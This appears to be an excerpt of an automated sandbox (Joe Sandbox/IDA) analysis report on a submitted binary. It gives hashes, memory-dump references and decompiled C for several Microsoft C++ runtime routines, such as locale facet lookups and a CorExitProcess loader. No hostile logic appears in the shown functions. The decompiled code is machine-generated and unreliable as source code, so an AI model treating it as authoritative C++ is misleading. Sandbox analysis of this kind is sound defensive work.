                                                                                                                              • Instruction ID: bf1a36b24b0d41c65db81cc093220b9fc34787bdae8df597be756c127330fe84
                                                                                                                              • Opcode Fuzzy Hash: a4b21570df4506459b64e77bf585a2c123aaad5ed9740a2af35b95a2abfb9ebf
                                                                                                                              • Instruction Fuzzy Hash: BB4190B12083029BD724DF04D480AABB7E8EF9470AF10492FF49187350D77DEB99879A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004151F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E004151F0(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t25;
				intOrPtr _t30;
				void* _t34;
				void* _t39;
				signed int _t42;
				signed int _t43;
				intOrPtr _t45;
				signed int _t57;
				intOrPtr _t60;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t66;

				_push(0xffffffff);
				_push(E004310E8);
				_push( *[fs:0x0]);
				_t64 = _t63 - 0x18;
				_t25 =  *0x43a6a8; // 0x2a5cd135
				_push(_t25 ^ _t64);
				 *[fs:0x0] =  &_v12;
				_t47 =  &_v28;
				E0041A113( &_v28, 0);
				_t45 =  *0x43bee0; // 0x0
				_v8 = 0;
				_v40 = _t45;
				if( *0x43bf7c == 0) {
					E0041A113( &_v32, 0);
					if( *0x43bf7c == 0) {
						_t42 =  *0x43bf70; // 0x0
						_t43 = _t42 + 1;
						 *0x43bf70 = _t43;
						 *0x43bf7c = _t43;
					}
					_t47 =  &_v32;
					E0041A134( &_v32);
				}
				_t57 =  *0x43bf7c; // 0x0
				_t30 =  *_a4;
				if(_t57 >=  *((intOrPtr*)(_t30 + 0xc))) {
					_t60 = 0;
					goto L6;
				} else {
					_t47 =  *((intOrPtr*)(_t30 + 8));
					_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8)) + _t57 * 4));
					if(_t60 != 0) {
						L16:
						_v4 = 0xffffffff;
						E0041A134( &_v28);
						 *[fs:0x0] = _v12;
						return _t60;
					}
					L6:
					if( *((char*)(_t30 + 0x14)) == 0) {
						L9:
						if(_t60 != 0) {
							goto L16;
						}
						L10:
						if(_t45 == 0) {
							_t34 = E00414E20(_t45, _t47, _t55, _t57,  &_v36);
							_t66 = _t64 + 4;
							if(_t34 == 0xffffffff) {
								E0041AA74( &_v24, "bad cast");
								E0041ADC6( &_v28, 0x4385b0);
							}
							_t60 = _v36;
							 *0x43bee0 = _t60;
							E00413420();
							E0041A26F(_t45, _t55, _t57, _t62, _t60);
							_t64 = _t66 + 4;
						} else {
							_t60 = _t45;
						}
						goto L16;
					}
					_t39 = E0041A1A1();
					if(_t57 >=  *((intOrPtr*)(_t39 + 0xc))) {
						goto L10;
					}
					_t55 =  *((intOrPtr*)(_t39 + 8));
					_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 8)) + _t57 * 4));
					goto L9;
				}
			}


























                                                                                                                              0x004151f0
                                                                                                                              0x004151f2
                                                                                                                              0x004151fd
                                                                                                                              0x004151fe
                                                                                                                              0x00415204
                                                                                                                              0x0041520b
                                                                                                                              0x00415210
                                                                                                                              0x00415218
                                                                                                                              0x0041521c
                                                                                                                              0x00415228
                                                                                                                              0x0041522e
                                                                                                                              0x00415236
                                                                                                                              0x0041523a
                                                                                                                              0x00415242
                                                                                                                              0x0041524e
                                                                                                                              0x00415250
                                                                                                                              0x00415255
                                                                                                                              0x00415258
                                                                                                                              0x0041525d
                                                                                                                              0x0041525d
                                                                                                                              0x00415262
                                                                                                                              0x00415266
                                                                                                                              0x00415266
                                                                                                                              0x0041526f
                                                                                                                              0x00415275
                                                                                                                              0x0041527a
                                                                                                                              0x004152a8
                                                                                                                              0x00000000
                                                                                                                              0x0041527c
                                                                                                                              0x0041527c
                                                                                                                              0x0041527f
                                                                                                                              0x00415284
                                                                                                                              0x004152f5
                                                                                                                              0x004152f9
                                                                                                                              0x00415301
                                                                                                                              0x0041530c
                                                                                                                              0x0041531a
                                                                                                                              0x0041531a
                                                                                                                              0x00415286
                                                                                                                              0x0041528a
                                                                                                                              0x0041529c
                                                                                                                              0x0041529e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004152a0
                                                                                                                              0x004152a2
                                                                                                                              0x004152b1
                                                                                                                              0x004152b6
                                                                                                                              0x004152bc
                                                                                                                              0x004152c7
                                                                                                                              0x004152d6
                                                                                                                              0x004152d6
                                                                                                                              0x004152db
                                                                                                                              0x004152e1
                                                                                                                              0x004152e7
                                                                                                                              0x004152ed
                                                                                                                              0x004152f2
                                                                                                                              0x004152a4
                                                                                                                              0x004152a4
                                                                                                                              0x004152a4
                                                                                                                              0x00000000
                                                                                                                              0x004152a2
                                                                                                                              0x0041528c
                                                                                                                              0x00415294
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00415296
                                                                                                                              0x00415299
                                                                                                                              0x00000000
                                                                                                                              0x00415299

                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0041521C
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00415242
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004152D6
                                                                                                                              • std::locale::facet::facet_Register.LIBCPMT ref: 004152ED
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::locale::facet::facet_
                                                                                                                              • String ID: bad cast
                                                                                                                              • API String ID: 1988240374-3145022300
                                                                                                                              • Opcode ID: a23eb7e2f7414a1189d7075045d59b3419f1513dff058ce0f9eed73b22078481
                                                                                                                              • Instruction ID: 230906bae5e97586abfdaafa50dfdc7a5d9008273539ac3e6e87047be0ede4cb
                                                                                                                              • Opcode Fuzzy Hash: a23eb7e2f7414a1189d7075045d59b3419f1513dff058ce0f9eed73b22078481
                                                                                                                              • Instruction Fuzzy Hash: 3931CE72504740DBC710DF24D882BDA77A0FB98724F4416AFF951972A2D738A884CF9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00416380 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E00416380(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t25;
				intOrPtr _t30;
				void* _t34;
				void* _t39;
				signed int _t42;
				signed int _t43;
				intOrPtr _t45;
				signed int _t57;
				intOrPtr _t60;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t66;

				_push(0xffffffff);
				_push(E004310E8);
				_push( *[fs:0x0]);
				_t64 = _t63 - 0x18;
				_t25 =  *0x43a6a8; // 0x2a5cd135
				_push(_t25 ^ _t64);
				 *[fs:0x0] =  &_v12;
				_t47 =  &_v28;
				E0041A113( &_v28, 0);
				_t45 =  *0x43bee4; // 0x0
				_v8 = 0;
				_v40 = _t45;
				if( *0x43bef0 == 0) {
					E0041A113( &_v32, 0);
					if( *0x43bef0 == 0) {
						_t42 =  *0x43bf70; // 0x0
						_t43 = _t42 + 1;
						 *0x43bf70 = _t43;
						 *0x43bef0 = _t43;
					}
					_t47 =  &_v32;
					E0041A134( &_v32);
				}
				_t57 =  *0x43bef0; // 0x0
				_t30 =  *_a4;
				if(_t57 >=  *((intOrPtr*)(_t30 + 0xc))) {
					_t60 = 0;
					goto L6;
				} else {
					_t47 =  *((intOrPtr*)(_t30 + 8));
					_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8)) + _t57 * 4));
					if(_t60 != 0) {
						L16:
						_v4 = 0xffffffff;
						E0041A134( &_v28);
						 *[fs:0x0] = _v12;
						return _t60;
					}
					L6:
					if( *((char*)(_t30 + 0x14)) == 0) {
						L9:
						if(_t60 != 0) {
							goto L16;
						}
						L10:
						if(_t45 == 0) {
							_t34 = E00416160(_t45, _t47, _t55, _t57,  &_v36);
							_t66 = _t64 + 4;
							if(_t34 == 0xffffffff) {
								E0041AA74( &_v24, "bad cast");
								E0041ADC6( &_v28, 0x4385b0);
							}
							_t60 = _v36;
							 *0x43bee4 = _t60;
							E00413420();
							E0041A26F(_t45, _t55, _t57, _t62, _t60);
							_t64 = _t66 + 4;
						} else {
							_t60 = _t45;
						}
						goto L16;
					}
					_t39 = E0041A1A1();
					if(_t57 >=  *((intOrPtr*)(_t39 + 0xc))) {
						goto L10;
					}
					_t55 =  *((intOrPtr*)(_t39 + 8));
					_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 8)) + _t57 * 4));
					goto L9;
				}
			}


























                                                                                                                              0x00416380
                                                                                                                              0x00416382
                                                                                                                              0x0041638d
                                                                                                                              0x0041638e
                                                                                                                              0x00416394
                                                                                                                              0x0041639b
                                                                                                                              0x004163a0
                                                                                                                              0x004163a8
                                                                                                                              0x004163ac
                                                                                                                              0x004163b8
                                                                                                                              0x004163be
                                                                                                                              0x004163c6
                                                                                                                              0x004163ca
                                                                                                                              0x004163d2
                                                                                                                              0x004163de
                                                                                                                              0x004163e0
                                                                                                                              0x004163e5
                                                                                                                              0x004163e8
                                                                                                                              0x004163ed
                                                                                                                              0x004163ed
                                                                                                                              0x004163f2
                                                                                                                              0x004163f6
                                                                                                                              0x004163f6
                                                                                                                              0x004163ff
                                                                                                                              0x00416405
                                                                                                                              0x0041640a
                                                                                                                              0x00416438
                                                                                                                              0x00000000
                                                                                                                              0x0041640c
                                                                                                                              0x0041640c
                                                                                                                              0x0041640f
                                                                                                                              0x00416414
                                                                                                                              0x00416485
                                                                                                                              0x00416489
                                                                                                                              0x00416491
                                                                                                                              0x0041649c
                                                                                                                              0x004164aa
                                                                                                                              0x004164aa
                                                                                                                              0x00416416
                                                                                                                              0x0041641a
                                                                                                                              0x0041642c
                                                                                                                              0x0041642e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00416430
                                                                                                                              0x00416432
                                                                                                                              0x00416441
                                                                                                                              0x00416446
                                                                                                                              0x0041644c
                                                                                                                              0x00416457
                                                                                                                              0x00416466
                                                                                                                              0x00416466
                                                                                                                              0x0041646b
                                                                                                                              0x00416471
                                                                                                                              0x00416477
                                                                                                                              0x0041647d
                                                                                                                              0x00416482
                                                                                                                              0x00416434
                                                                                                                              0x00416434
                                                                                                                              0x00416434
                                                                                                                              0x00000000
                                                                                                                              0x00416432
                                                                                                                              0x0041641c
                                                                                                                              0x00416424
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00416426
                                                                                                                              0x00416429
                                                                                                                              0x00000000
                                                                                                                              0x00416429

                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004163AC
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004163D2
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00416466
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LockitLockit::_std::_$Exception@8Throw
                                                                                                                              • String ID: V=$bad cast
                                                                                                                              • API String ID: 3587384700-27661808
                                                                                                                              • Opcode ID: 05ceef57e76553474127d5f8e0c63b0da4c3b201eb4a56f8dcc9e3455b48e0a6
                                                                                                                              • Instruction ID: a29547e0066ce3047b7ce5fe82d8c0e6d8464ed51e2bba4b1f3fd1a986866490
                                                                                                                              • Opcode Fuzzy Hash: 05ceef57e76553474127d5f8e0c63b0da4c3b201eb4a56f8dcc9e3455b48e0a6
                                                                                                                              • Instruction Fuzzy Hash: 6231CE725043519BC714DF28D882B9B73A4FF54728F46062EF951572A2D738E884CBDE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004164B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E004164B0(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t25;
				intOrPtr _t30;
				void* _t34;
				void* _t39;
				signed int _t42;
				signed int _t43;
				intOrPtr _t45;
				signed int _t57;
				intOrPtr _t60;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t66;

				_push(0xffffffff);
				_push(E004310E8);
				_push( *[fs:0x0]);
				_t64 = _t63 - 0x18;
				_t25 =  *0x43a6a8; // 0x2a5cd135
				_push(_t25 ^ _t64);
				 *[fs:0x0] =  &_v12;
				_t47 =  &_v28;
				E0041A113( &_v28, 0);
				_t45 =  *0x43bee8; // 0x0
				_v8 = 0;
				_v40 = _t45;
				if( *0x43beec == 0) {
					E0041A113( &_v32, 0);
					if( *0x43beec == 0) {
						_t42 =  *0x43bf70; // 0x0
						_t43 = _t42 + 1;
						 *0x43bf70 = _t43;
						 *0x43beec = _t43;
					}
					_t47 =  &_v32;
					E0041A134( &_v32);
				}
				_t57 =  *0x43beec; // 0x0
				_t30 =  *_a4;
				if(_t57 >=  *((intOrPtr*)(_t30 + 0xc))) {
					_t60 = 0;
					goto L6;
				} else {
					_t47 =  *((intOrPtr*)(_t30 + 8));
					_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8)) + _t57 * 4));
					if(_t60 != 0) {
						L16:
						_v4 = 0xffffffff;
						E0041A134( &_v28);
						 *[fs:0x0] = _v12;
						return _t60;
					}
					L6:
					if( *((char*)(_t30 + 0x14)) == 0) {
						L9:
						if(_t60 != 0) {
							goto L16;
						}
						L10:
						if(_t45 == 0) {
							_t34 = E004161D0(_t47, _t55, _t57,  &_v36);
							_t66 = _t64 + 4;
							if(_t34 == 0xffffffff) {
								E0041AA74( &_v24, "bad cast");
								E0041ADC6( &_v28, 0x4385b0);
							}
							_t60 = _v36;
							 *0x43bee8 = _t60;
							E00413420();
							E0041A26F(_t45, _t55, _t57, _t62, _t60);
							_t64 = _t66 + 4;
						} else {
							_t60 = _t45;
						}
						goto L16;
					}
					_t39 = E0041A1A1();
					if(_t57 >=  *((intOrPtr*)(_t39 + 0xc))) {
						goto L10;
					}
					_t55 =  *((intOrPtr*)(_t39 + 8));
					_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 8)) + _t57 * 4));
					goto L9;
				}
			}


























                                                                                                                              0x004164b0
                                                                                                                              0x004164b2
                                                                                                                              0x004164bd
                                                                                                                              0x004164be
                                                                                                                              0x004164c4
                                                                                                                              0x004164cb
                                                                                                                              0x004164d0
                                                                                                                              0x004164d8
                                                                                                                              0x004164dc
                                                                                                                              0x004164e8
                                                                                                                              0x004164ee
                                                                                                                              0x004164f6
                                                                                                                              0x004164fa
                                                                                                                              0x00416502
                                                                                                                              0x0041650e
                                                                                                                              0x00416510
                                                                                                                              0x00416515
                                                                                                                              0x00416518
                                                                                                                              0x0041651d
                                                                                                                              0x0041651d
                                                                                                                              0x00416522
                                                                                                                              0x00416526
                                                                                                                              0x00416526
                                                                                                                              0x0041652f
                                                                                                                              0x00416535
                                                                                                                              0x0041653a
                                                                                                                              0x00416568
                                                                                                                              0x00000000
                                                                                                                              0x0041653c
                                                                                                                              0x0041653c
                                                                                                                              0x0041653f
                                                                                                                              0x00416544
                                                                                                                              0x004165b5
                                                                                                                              0x004165b9
                                                                                                                              0x004165c1
                                                                                                                              0x004165cc
                                                                                                                              0x004165da
                                                                                                                              0x004165da
                                                                                                                              0x00416546
                                                                                                                              0x0041654a
                                                                                                                              0x0041655c
                                                                                                                              0x0041655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00416560
                                                                                                                              0x00416562
                                                                                                                              0x00416571
                                                                                                                              0x00416576
                                                                                                                              0x0041657c
                                                                                                                              0x00416587
                                                                                                                              0x00416596
                                                                                                                              0x00416596
                                                                                                                              0x0041659b
                                                                                                                              0x004165a1
                                                                                                                              0x004165a7
                                                                                                                              0x004165ad
                                                                                                                              0x004165b2
                                                                                                                              0x00416564
                                                                                                                              0x00416564
                                                                                                                              0x00416564
                                                                                                                              0x00000000
                                                                                                                              0x00416562
                                                                                                                              0x0041654c
                                                                                                                              0x00416554
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00416556
                                                                                                                              0x00416559
                                                                                                                              0x00000000
                                                                                                                              0x00416559

                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004164DC
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00416502
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00416596
                                                                                                                              • std::locale::facet::facet_Register.LIBCPMT ref: 004165AD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::locale::facet::facet_
                                                                                                                              • String ID: bad cast
                                                                                                                              • API String ID: 1988240374-3145022300
                                                                                                                              • Opcode ID: b3492684f9d4f0f9e849790e7be250480e9bf2ab03fc05208124e9dbb8912f56
                                                                                                                              • Instruction ID: 465e066fc439957b2ec425e3f9cb23870c82c99bbbabbff8ad4336213a6dc0ec
                                                                                                                              • Opcode Fuzzy Hash: b3492684f9d4f0f9e849790e7be250480e9bf2ab03fc05208124e9dbb8912f56
                                                                                                                              • Instruction Fuzzy Hash: 7231CE72504350ABC710DF28E882B9A77A5FB54728F45062EF941573A2D738E984CBDA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00971CAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00971D38,?,?,00971DB9,?,?,?), ref: 00971CC3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00971CD6
                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00971D38,?,?,00971DB9,?,?,?), ref: 00971CF9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                              • Opcode ID: f3df4097b74acc77abadae85ce85aa3efb4c3cdee1dae8c7ecbda5497635f057
                                                                                                                              • Instruction ID: 9ed4d81430067ce96916ce611b78556459af4c0371edec1fe495da89e77de3b2
                                                                                                                              • Opcode Fuzzy Hash: f3df4097b74acc77abadae85ce85aa3efb4c3cdee1dae8c7ecbda5497635f057
                                                                                                                              • Instruction Fuzzy Hash: B5F0A732650219FBDB129B94DE09B9D7A7DEB44B56F140054F809E1260CB708E01EB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00429A71 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E00429A71(void* __edx, signed int _a4, signed char** _a8) {
				signed int _v8;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t45;
				void* _t49;
				void* _t53;
				signed short _t56;
				signed short _t81;
				signed char* _t93;
				signed char* _t102;
				signed char* _t104;
				signed char** _t114;
				signed int _t115;

				_t112 = __edx;
				_t39 =  *0x43a6a8; // 0x2a5cd135
				_v8 = _t39 ^ _t115;
				_t114 = _a8;
				if((_t114[3] & 0x00000040) != 0) {
					L34:
					_t34 =  &(_t114[1]);
					 *_t34 =  &(_t114[1][0xfffffffffffffffe]);
					if( *_t34 < 0) {
						_t42 = E0042C7C1(_t81, _t112, 0x43b3f0, _a4 & 0x0000ffff, _t114);
					} else {
						_t42 = _a4;
						 *( *_t114) = _a4;
						 *_t114 =  &(( *_t114)[2]);
					}
					L37:
					return E0041B3F9(_t42, _t81, _v8 ^ _t115, _t112, 0x43b3f0, _t114);
				}
				if(E00429A44(_t81, __edx, 0x43b3f0, _t114) == 0xffffffff || E00429A44(_t81, __edx, 0x43b3f0, _t114) == 0xfffffffe) {
					_t45 = 0x43b3f0;
				} else {
					_t81 = 0x43cca0 + (E00429A44(_t81, __edx, 0x43b3f0, _t114) >> 5) * 4;
					_t45 = ((E00429A44(_t81, _t112, 0x43b3f0, _t114) & 0x0000001f) << 6) +  *_t81;
				}
				_t8 = _t45 + 0x24; // 0x0
				if(( *_t8 & 0x0000007f) == 2) {
					goto L34;
				} else {
					if(E00429A44(_t81, _t112, 0x43b3f0, _t114) == 0xffffffff || E00429A44(_t81, _t112, 0x43b3f0, _t114) == 0xfffffffe) {
						_t49 = 0x43b3f0;
					} else {
						_t81 = 0x43cca0 + (E00429A44(_t81, _t112, 0x43b3f0, _t114) >> 5) * 4;
						_t49 = ((E00429A44(_t81, _t112, 0x43b3f0, _t114) & 0x0000001f) << 6) +  *_t81;
					}
					_t11 = _t49 + 0x24; // 0x0
					if(( *_t11 & 0x0000007f) != 1) {
						if(E00429A44(_t81, _t112, 0x43b3f0, _t114) == 0xffffffff || E00429A44(_t81, _t112, 0x43b3f0, _t114) == 0xfffffffe) {
							_t53 = 0x43b3f0;
						} else {
							_t81 = 0x43cca0 + (E00429A44(_t81, _t112, 0x43b3f0, _t114) >> 5) * 4;
							_t53 = ((E00429A44(_t81, _t112, 0x43b3f0, _t114) & 0x0000001f) << 6) +  *_t81;
						}
						if(( *(_t53 + 4) & 0x00000080) == 0) {
							goto L34;
						} else {
							_t56 = E0042BFC1( &_v20,  &_v16, 5, _a4);
							if(_t56 != 0) {
								goto L15;
							}
							_t81 = 0;
							if(_v20 <= 0) {
								L33:
								_t42 = _a4;
								goto L37;
							} else {
								goto L28;
							}
							while(1) {
								L28:
								_t26 =  &(_t114[1]);
								 *_t26 = _t114[1] - 1;
								if( *_t26 < 0) {
									_t56 = E004212ED(_t81, _t112, 0x43b3f0,  *((char*)(_t115 + _t81 - 0xc)), _t114);
								} else {
									 *( *_t114) =  *((intOrPtr*)(_t115 + _t81 - 0xc));
									_t93 =  *_t114;
									_t56 =  *_t93 & 0x000000ff;
									 *_t114 =  &(_t93[1]);
								}
								if(_t56 == 0xffffffff) {
									goto L15;
								}
								_t81 = _t81 + 1;
								if(_t81 < _v20) {
									continue;
								}
								goto L33;
							}
							goto L15;
						}
					} else {
						_t12 =  &(_t114[1]);
						 *_t12 = _t114[1] - 1;
						_t81 = _a4;
						if( *_t12 < 0) {
							_t56 = E004212ED(_t81, _t112, 0x43b3f0, _t81, _t114);
						} else {
							 *( *_t114) = _t81;
							_t104 =  *_t114;
							_t56 =  *_t104 & 0x000000ff;
							 *_t114 =  &(_t104[1]);
						}
						if(_t56 != 0xffffffff) {
							_t15 =  &(_t114[1]);
							 *_t15 = _t114[1] - 1;
							if( *_t15 < 0) {
								_t56 = E004212ED(_t81, _t112, 0x43b3f0, _t81, _t114);
							} else {
								 *( *_t114) = _t81;
								_t102 =  *_t114;
								_t56 =  *_t102 & 0x000000ff;
								 *_t114 =  &(_t102[1]);
							}
							if(_t56 == 0xffffffff) {
								goto L15;
							} else {
								_t42 = _t81;
								goto L37;
							}
						} else {
							L15:
							_t42 = _t56 | 0x0000ffff;
							goto L37;
						}
					}
				}
			}




















                                                                                                                              0x00429a71
                                                                                                                              0x00429a77
                                                                                                                              0x00429a7e
                                                                                                                              0x00429a83
                                                                                                                              0x00429a8b
                                                                                                                              0x00429c20
                                                                                                                              0x00429c20
                                                                                                                              0x00429c20
                                                                                                                              0x00429c24
                                                                                                                              0x00429c39
                                                                                                                              0x00429c26
                                                                                                                              0x00429c28
                                                                                                                              0x00429c2b
                                                                                                                              0x00429c2e
                                                                                                                              0x00429c2e
                                                                                                                              0x00429c40
                                                                                                                              0x00429c4e
                                                                                                                              0x00429c4e
                                                                                                                              0x00429aa0
                                                                                                                              0x00429ad0
                                                                                                                              0x00429aae
                                                                                                                              0x00429ab8
                                                                                                                              0x00429acb
                                                                                                                              0x00429acd
                                                                                                                              0x00429ad2
                                                                                                                              0x00429ad9
                                                                                                                              0x00000000
                                                                                                                              0x00429adf
                                                                                                                              0x00429ae9
                                                                                                                              0x00429b19
                                                                                                                              0x00429af7
                                                                                                                              0x00429b01
                                                                                                                              0x00429b14
                                                                                                                              0x00429b16
                                                                                                                              0x00429b1b
                                                                                                                              0x00429b22
                                                                                                                              0x00429b8a
                                                                                                                              0x00429bba
                                                                                                                              0x00429b98
                                                                                                                              0x00429ba2
                                                                                                                              0x00429bb5
                                                                                                                              0x00429bb7
                                                                                                                              0x00429bc0
                                                                                                                              0x00000000
                                                                                                                              0x00429bc2
                                                                                                                              0x00429bcf
                                                                                                                              0x00429bd9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429bdf
                                                                                                                              0x00429be4
                                                                                                                              0x00429c1a
                                                                                                                              0x00429c1a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429be6
                                                                                                                              0x00429be6
                                                                                                                              0x00429be6
                                                                                                                              0x00429be6
                                                                                                                              0x00429be9
                                                                                                                              0x00429c04
                                                                                                                              0x00429beb
                                                                                                                              0x00429bf1
                                                                                                                              0x00429bf3
                                                                                                                              0x00429bf5
                                                                                                                              0x00429bf9
                                                                                                                              0x00429bf9
                                                                                                                              0x00429c0e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429c14
                                                                                                                              0x00429c18
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429c18
                                                                                                                              0x00000000
                                                                                                                              0x00429be6
                                                                                                                              0x00429b24
                                                                                                                              0x00429b24
                                                                                                                              0x00429b24
                                                                                                                              0x00429b27
                                                                                                                              0x00429b2a
                                                                                                                              0x00429b3f
                                                                                                                              0x00429b2c
                                                                                                                              0x00429b2e
                                                                                                                              0x00429b30
                                                                                                                              0x00429b32
                                                                                                                              0x00429b36
                                                                                                                              0x00429b36
                                                                                                                              0x00429b49
                                                                                                                              0x00429b54
                                                                                                                              0x00429b54
                                                                                                                              0x00429b57
                                                                                                                              0x00429b6c
                                                                                                                              0x00429b59
                                                                                                                              0x00429b5b
                                                                                                                              0x00429b5d
                                                                                                                              0x00429b5f
                                                                                                                              0x00429b63
                                                                                                                              0x00429b63
                                                                                                                              0x00429b76
                                                                                                                              0x00000000
                                                                                                                              0x00429b78
                                                                                                                              0x00429b78
                                                                                                                              0x00000000
                                                                                                                              0x00429b78
                                                                                                                              0x00429b4b
                                                                                                                              0x00429b4b
                                                                                                                              0x00429b4b
                                                                                                                              0x00000000
                                                                                                                              0x00429b4b
